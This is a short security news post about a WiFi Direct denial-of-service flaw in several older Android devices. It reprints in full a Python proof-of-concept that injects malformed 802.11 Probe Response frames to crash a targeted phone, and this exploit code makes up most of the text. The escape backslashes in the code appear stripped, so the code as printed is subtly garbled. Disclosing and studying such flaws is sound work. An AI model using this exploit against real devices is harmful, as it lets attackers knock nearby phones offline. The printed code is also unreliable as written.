Android Devices are vulnerable to DOS from WiFi Direct vulnerability discovered by Andres Blanco from the CoreLabs
An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class.
Vulnerable Packages include:
. Nexus 5 – Android 4.4.4
. Nexus 4 – Android 4.4.4
. LG D806 – Android 4.2.2
. Samsung SM-T310 – Android 4.2.2
. Motorola RAZR HD – Android 4.1.2
Coresec disclosed the vulnerability on Seclists, the bug is in the modified wpa_supplicant function which provides the interface between the wireless driver and the Android platform.
If the attacker sends a malformed wpa_supplicant value then Android’s WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.
Here is the POC example from seclist:
This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library. /----- #!/usr/bin/env python import sys import time import struct import PyLorcon2 def get_probe_response(source, destination, channel): frame = str() frame += "x50x00" # Frame Control frame += "x00x00" # Duration frame += destination frame += source frame += source frame += "x00x00" # Sequence Control frame += "x00x00x00x00x00x00x00x00" # Timestamp frame += "x64x00" # Beacon Interval frame += "x30x04" # Capabilities Information # SSID IE frame += "x00" frame += "x07" frame += "DIRECT-" # Supported Rates frame += "x01" frame += "x08" frame += "x8Cx12x98x24xB0x48x60x6C" # DS Parameter Set frame += "x03" frame += "x01" frame += struct.pack("B", channel) # P2P frame += "xDD" frame += "x27" frame += "x50x6Fx9A" frame += "x09" # P2P Capabilities frame += "x02" # ID frame += "x02x00" # Length frame += "x21x00" # P2P Device Info frame += "x0D" # ID frame += "x1Bx00" # Length frame += source frame += "x01x88" frame += "x00x0Ax00x50xF2x04x00x05" frame += "x00" frame += "x10x11" frame += "x00x06" frame += "fafaxFAxFA" return frame def str_to_mac(address): return "".join(map(lambda i: chr(int(i, 16)), address.split(":"))) if __name__ == "__main__": if len(sys.argv) != 3: print "Usage:" print " " print "Example:" print " wlan0 00:11:22:33:44:55" sys.exit(-1) iface = sys.argv[1] destination = str_to_mac(sys.argv[2]) context = PyLorcon2.Context(iface) context.open_injmon() channel = 1 source = str_to_mac("00:11:22:33:44:55") frame = get_probe_response(source, destination, channel) print "Injecting PoC." for i in range(100): context.send_bytes(frame) time.sleep(0.100) -----/